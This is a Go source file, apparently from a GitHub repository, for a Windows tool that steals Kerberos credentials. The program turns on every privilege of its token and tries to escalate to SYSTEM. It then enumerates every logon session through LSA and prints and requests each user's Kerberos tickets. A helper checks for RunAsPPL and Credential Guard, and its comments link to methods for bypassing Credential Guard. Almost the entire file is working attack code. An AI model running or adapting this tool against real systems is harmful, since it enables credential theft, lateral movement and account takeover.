-
Notifications
You must be signed in to change notification settings - Fork 0
/
main.go
132 lines (114 loc) · 3.65 KB
/
main.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
package main
import (
"fmt"
"log"
"os"
"time"
"github.com/redt1de/gubeus/lsa"
"github.com/fourcorelabs/wintoken"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
)
var DEBUG bool
func main() {
DEBUG = true
// CheckProtect()
// return
if len(os.Args) > 1 {
time.Sleep(time.Second * 20)
}
lsa.DebugLSA = false
// check privs
curToken, err := wintoken.OpenProcessToken(int(windows.GetCurrentProcessId()), wintoken.TokenPrimary)
if err != nil {
panic(err)
}
defer curToken.Close()
if !curToken.Token().IsElevated() {
log.Fatal("[ERROR] Not running in an elevated context")
}
curToken.EnableAllPrivileges()
privs, _ := curToken.GetPrivileges()
for _, p := range privs {
if p.Name == "SeImpersonatePrivilege" {
fmt.Println("[+] We have SeImpersonatePrivilege")
}
}
// attempt to escalate to system
GetSystem()
// get handle to lsa
lsaHandle, err := lsa.GetLsaHAndle()
if err != nil {
log.Fatal(err)
}
fmt.Println("[+] LSA Handle:", &lsaHandle)
// get the auth package
authPack, err := lsa.LookupAuthPackage(lsaHandle)
if err != nil {
log.Fatal(err)
}
fmt.Println("[+] Auth Package:", authPack)
// enumerate logon sessions
luids, err := lsa.GetLogonSessions()
if err != nil {
fmt.Println("[ERROR] GetLogonSessions:", err)
os.Exit(1)
}
fmt.Println()
for _, luid := range luids {
// get info about the session
sd, err := lsa.GetLogonSessionData(&luid)
if err != nil {
fmt.Println("[ERROR] LsaGetLogonSessionData:", err)
os.Exit(1)
}
// get info about the ticket
ticketInfos := lsa.GetTicketInfoExS(lsaHandle, authPack, luid, sd)
if len(ticketInfos) > 0 {
fmt.Println("##################################################")
fmt.Println("Username:", sd.UserName)
fmt.Println("SID:", sd.Sid)
fmt.Println("Ticket Count:", len(ticketInfos))
for _, tic := range ticketInfos {
fmt.Println("------------------------------------------")
fmt.Println("Client Name:", tic.ClientName)
fmt.Println("Client Realm:", tic.ClientRealm)
fmt.Println("Server Name:", tic.ServerName)
fmt.Println("Server Realm:", tic.ServerRealm)
fmt.Println("Start Time:", lsa.TimeFromUint64(uint64(tic.StartTime)))
fmt.Println("End Time:", lsa.TimeFromUint64(uint64(tic.EndTime)))
fmt.Println("Renew Time:", lsa.TimeFromUint64(uint64(tic.RenewTime)))
// request the actual ticket
lsa.GetTicket(lsaHandle, authPack, luid, sd, tic.ServerName)
}
}
}
}
// RunAsPPL
// HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa.
// Set the value of the registry key to:
// "RunAsPPL"=dword:00000001 to configure the feature with a UEFI variable.
// "RunAsPPL"=dword:00000002 to configure the feature without a UEFI variable (only on Windows 11, 22H2).
// poc to patch wdigest.dll to bypass
// https://teamhydra.blog/2020/08/25/bypassing-credential-guard/
// https://gist.github.com/N4kedTurtle/8238f64d18932c7184faa2d0af2f1240
func CheckProtect() bool {
// check for RunAsPPL
regInfo, err := registry.OpenKey(registry.LOCAL_MACHINE, `SYSTEM\CurrentControlSet\Control\Lsa`, registry.QUERY_VALUE)
if err != nil {
log.Fatal(err)
}
a, _, _ := regInfo.GetIntegerValue("RunAsPPL")
if a != 0 {
log.Fatal("[ERROR] RunAsPPL is enabled, this is not going to work!")
}
regInfo, err = registry.OpenKey(registry.LOCAL_MACHINE, `SYSTEM\CurrentControlSet\Control\Lsa`, registry.QUERY_VALUE)
if err != nil {
log.Fatal(err)
}
a, _, _ = regInfo.GetIntegerValue("LsaCfgFlags")
if a != 0 {
log.Fatal("[ERROR] Credential Guard is enabled, this is not going to work!")
}
return false
}